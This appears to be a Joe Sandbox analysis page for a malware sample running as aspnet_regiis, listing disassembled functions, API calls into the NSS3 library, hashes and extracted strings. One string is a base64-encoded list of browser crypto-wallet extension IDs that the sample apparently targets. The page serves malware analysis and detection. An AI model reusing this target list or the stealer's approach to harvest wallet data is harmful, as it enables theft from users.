Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 8fdf7c02b9987bc56eb736937c65886fc5bb5e1d8e7113173dae66978f268ba5
Instruction ID: 840913abacd9b7e083f0043301f5d3903598cbc21688d8de75e9974796854045
Opcode Fuzzy Hash: 8fdf7c02b9987bc56eb736937c65886fc5bb5e1d8e7113173dae66978f268ba5
Instruction Fuzzy Hash: 3A118CB1A00606ABFB10DEA5DCC4F46F3A8EB0435AF308535E91986A01E331E46487E1

Function 6C4308D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C4309B3,0000001A,?), ref: 6C4308E9

Part of subcall function 6C420840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4208B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C4308FD

Part of subcall function 6C41FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C418D2D,?,00000000,?), ref: 6C41FB85
Part of subcall function 6C41FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C41FBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C430939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C430953

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: b101e90b7f4fb628105299332d420ff78064237113e738fdd8b8c8f37f824fd1
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: D40100B1A0236A2BFB04DA3B9C10F6737989FC8219F00523DEC1EC6F01EB21E4148A90

Function 6C4149C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418821
Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C41883D
Part of subcall function 6C418800: EnterCriticalSection.KERNEL32(?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418856
Part of subcall function 6C418800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C418887
Part of subcall function 6C418800: PR_Unlock.NSS3(?,?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418899

PR_SetError.NSS3 ref: 6C414A10
TlsGetValue.KERNEL32(6C40781D,?,6C3FBD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C414A24
EnterCriticalSection.KERNEL32(?,?,?,6C3FBD28,00CD52E8), ref: 6C414A39
PR_Unlock.NSS3(?,?,?,?,6C3FBD28,00CD52E8), ref: 6C414A4E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 37900b93e5d3e8f5f7ebc1626807e83d2f61af34f1397e15538d5aef7c1900a8
Instruction ID: cbbace4355d0fb62c43525e8702a6c2e3825fc7f1765e983e83c863af2880cda
Opcode Fuzzy Hash: 37900b93e5d3e8f5f7ebc1626807e83d2f61af34f1397e15538d5aef7c1900a8
Instruction Fuzzy Hash: F62138B4A086008FDB00EF79C989D6ABBF4BF45399B024929DCC59BF01E735E845CB95

Function 6C3E8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3E8DE7
EnterCriticalSection.KERNEL32 ref: 6C3E8DFC
PR_Unlock.NSS3 ref: 6C3E8E2D
PR_SetError.NSS3 ref: 6C3E8E49

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 56fa778adf97d5e6de91f2e0c8bea5294ba45ca83089ca6ccbfb0b6b5a30296b
Instruction ID: 6fadae079d6031bcbf30315944c20cadcbe410e24ddb79ae986328c8a48155de
Opcode Fuzzy Hash: 56fa778adf97d5e6de91f2e0c8bea5294ba45ca83089ca6ccbfb0b6b5a30296b
Instruction Fuzzy Hash: 01118F71A05A109BDB00BF78C48856ABBF4FF49314F01492ADC88DBB00E731E894CBD2

Function 6C46AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C455F17,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C455F17,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46ACDB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 138cb9f6b4d3d6ec6143d97a4964d89fab3ffa1e94e981c6b62f19e8741a4a05
Instruction ID: 7f25efba08f91ff3fd732b1470f3763ad671a19bbca542f536617ea9633e8aec
Opcode Fuzzy Hash: 138cb9f6b4d3d6ec6143d97a4964d89fab3ffa1e94e981c6b62f19e8741a4a05
Instruction Fuzzy Hash: 940148B1601B129BEB50DF2AD909B57B7E8FF00A9AB104839E85AD7F00E731F054CB91

Function 6C4188E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C4208AA,?), ref: 6C4188F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C4208AA,?), ref: 6C41890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C4208AA,?), ref: 6C418936
PR_Unlock.NSS3(?,?,?,?,?,6C4208AA,?), ref: 6C418940

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 4b89dace8732fb474fb921233f6162a5cb5877e28ab8e058ba0333972dca62aa
Instruction ID: a7cf08b81b39defeae1b116ba358c4107cfa2b52962723d0e5ff1e7aa1a583c3
Opcode Fuzzy Hash: 4b89dace8732fb474fb921233f6162a5cb5877e28ab8e058ba0333972dca62aa
Instruction Fuzzy Hash: 37015EB46046059BD700EF39C584A69B7F4FB05399F06062AD8D487F00E730E894CBC2

Function 6C450840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C522F88,6C450660,00000020,00000000,?,?,6C452C3D,?,00000000,00000000,?,6C452A28,00000060,00000001), ref: 6C450860

Part of subcall function 6C344C70: TlsGetValue.KERNEL32(?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344C97
Part of subcall function 6C344C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CB0
Part of subcall function 6C344C70: PR_Unlock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C452C3D,?,00000000,00000000,?,6C452A28,00000060,00000001), ref: 6C450874
EnterCriticalSection.KERNEL32(00000001), ref: 6C450884
PR_Unlock.NSS3 ref: 6C4508A3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 4f03e3d8593d5c0df2d8be4416ab26a24c5b94edabfba546ab2155be2e5257ec
Instruction ID: 82b6d0794011620aafe89012960cfa3f88d89c877857bfbf2de5d72dd33b6108
Opcode Fuzzy Hash: 4f03e3d8593d5c0df2d8be4416ab26a24c5b94edabfba546ab2155be2e5257ec
Instruction Fuzzy Hash: 77012B7DA002446BEB10BB25DC46D567B78DB5632DF490575EC0856F02EB32A8A487E1

Function 6C450450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C454710,?,000F4240,00000000), ref: 6C45046B
GetLastError.KERNEL32(?,6C454710,?,000F4240,00000000), ref: 6C450479

Part of subcall function 6C46BF80: TlsGetValue.KERNEL32(00000000,?,6C45461B,-00000004), ref: 6C46C244

PR_Unlock.NSS3(40C70845,?,6C454710,?,000F4240,00000000), ref: 6C450492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C454710,?,000F4240,00000000), ref: 6C4504A5

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: bed17e81e83ce48e67619e02b61c7bc47f6f3f46a35c77f880c16d3057ee7eee
Instruction ID: 85091798e74690eb3984af8eefcf2fb06d99b637ad93fb55c385b2329fd46899
Opcode Fuzzy Hash: bed17e81e83ce48e67619e02b61c7bc47f6f3f46a35c77f880c16d3057ee7eee
Instruction Fuzzy Hash: 96F0B478B002455BEF00EFB69C1CF2A33A99B0220EF958434E80AC7F50EB21E4648551

Function 6C4DCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C4DCC61
free.MOZGLUE ref: 6C4DCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C4DCC80
free.MOZGLUE(?), ref: 6C4DCC87

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: ea28a4df2281548a3f909bcf5045836fcf36b421fb303a4a9f91d1a3b870dd20
Instruction ID: 02b24770d49120cbb5c5494b9bd93cb34fc782f28eaa00b419ce558c13b9c1bf
Opcode Fuzzy Hash: ea28a4df2281548a3f909bcf5045836fcf36b421fb303a4a9f91d1a3b870dd20
Instruction Fuzzy Hash: D7E030767006089BCA10EFA8DC4988A77ACEE492703160525E691C7700D332F905CBA5

Function 6C414D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C414D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C414DE6

Strings

%d.%d, xrefs: 6C414DDE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 2015f4125a0dc4eb9a885cefb89fb11cebbb1407ec5f9ae5b18d2f4fb3e3b253
Instruction ID: 7e271763c15d3b39334905f8404a4aacd2ca61bef7b334cb0f6ebd292c677be9
Opcode Fuzzy Hash: 2015f4125a0dc4eb9a885cefb89fb11cebbb1407ec5f9ae5b18d2f4fb3e3b253
Instruction Fuzzy Hash: 9131DBB2E082186BEB10DBA19C05FFF7768DF81348F050429ED559BB81EB709905CBE2

Function 6C48CF00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C48CF48

Strings

c2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2xoa2tlbmZlbHwxfDB8MHxDb2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8, xrefs: 6C48CF37
w=;l, xrefs: 6C48CF05

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: __aulldiv
String ID: c2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2xoa2tlbmZlbHwxfDB8MHxDb2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8$w=;l
API String ID: 3732870572-3931607149
Opcode ID: 2c55f5d2580c787dd17be38e820a3ef1c87b335acc34594e8d40fc2d1a3fad39
Instruction ID: aa862c0ecce5a5ca80643f851755aca86fb62fbd6810d08ac954621a9347fa5b
Opcode Fuzzy Hash: 2c55f5d2580c787dd17be38e820a3ef1c87b335acc34594e8d40fc2d1a3fad39
Instruction Fuzzy Hash: DD31E172A15B014ED326DF38C851B56F3E6EF96718B18C73EE04AE6A44F778E4C28640

Function 6C4B0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C4B0917
sqlite3_value_text.NSS3(?), ref: 6C4B0923

Part of subcall function 6C3713C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C342352,?,00000000,?,?), ref: 6C371413
Part of subcall function 6C3713C0: memcpy.VCRUNTIME140(00000000,R#4l,00000002,?,?,?,?,6C342352,?,00000000,?,?), ref: 6C3714C0

Strings

error in %s %s%s%s: %s, xrefs: 6C4B0944

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 4d2df0aa3713758a059dfa9b73163f4a76449e30c68988ee8311fdec34ee1820
Instruction ID: 6ea4fe28569a581b74ff3258b79e7f5f13555b0ab143183f51c0ebf959d9f6e6
Opcode Fuzzy Hash: 4d2df0aa3713758a059dfa9b73163f4a76449e30c68988ee8311fdec34ee1820
Instruction Fuzzy Hash: 600148B6E001445BE7009E58EC01DBE7BB5EFC1218F144029EC885BB01F732AD2487A2

Function 6C434CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8Cl,00000000,00000000,?,?,6C433827,?,00000000), ref: 6C434D0A

Part of subcall function 6C420840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4208B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C434D22

Part of subcall function 6C41FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C3C1A3E,00000048,00000054), ref: 6C41FD56

Strings

'8Cl, xrefs: 6C434D07

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8Cl
API String ID: 1521942269-2844380422
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: fcfd5f36c167863a1956ddbd7b558e7343b82089ad761b5e5b8363a1a40cbffc
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: C1F0687260113457EB118D6BAC41F933ADCDB896FEF242271DD1CCB781EA22CC0186D1

Function 6C45AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C45AF78

Part of subcall function 6C3BACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3BACE2
Part of subcall function 6C3BACC0: malloc.MOZGLUE(00000001), ref: 6C3BACEC
Part of subcall function 6C3BACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C3BAD02
Part of subcall function 6C3BACC0: TlsGetValue.KERNEL32 ref: 6C3BAD3C
Part of subcall function 6C3BACC0: calloc.MOZGLUE(00000001,?), ref: 6C3BAD8C
Part of subcall function 6C3BACC0: PR_Unlock.NSS3 ref: 6C3BADC0
Part of subcall function 6C3BACC0: PR_Unlock.NSS3 ref: 6C3BAE8C
Part of subcall function 6C3BACC0: free.MOZGLUE(?), ref: 6C3BAEAB

memcpy.VCRUNTIME140(6C523084,6C5202AC,00000090), ref: 6C45AF94

Strings

SSL, xrefs: 6C45AF73

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: dda55d48f5edbca1762a9c807b45c05bc8fdf007dbbacb3ee277604f11a113da
Instruction ID: f57346513268d33f2effe3eeb0d89d23bba8f524d3c619ad77795d7310414cd6
Opcode Fuzzy Hash: dda55d48f5edbca1762a9c807b45c05bc8fdf007dbbacb3ee277604f11a113da
Instruction Fuzzy Hash: 30217FB2701A489ECA10EF51AC43F26FAF9B307708B925008D2090BB24D7394028DFFD

Function 6C3CC810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]<l,6C3C6499,-00000078,00000000,?,?,]<l,?,6C3C5DEF,?), ref: 6C3CC821

Part of subcall function 6C3C1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C1E0B
Part of subcall function 6C3C1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C1E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]<l,?,6C3C5DEF,?,?,?), ref: 6C3CC857

Strings

]<l, xrefs: 6C3CC810

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]<l
API String ID: 221937774-2026694681
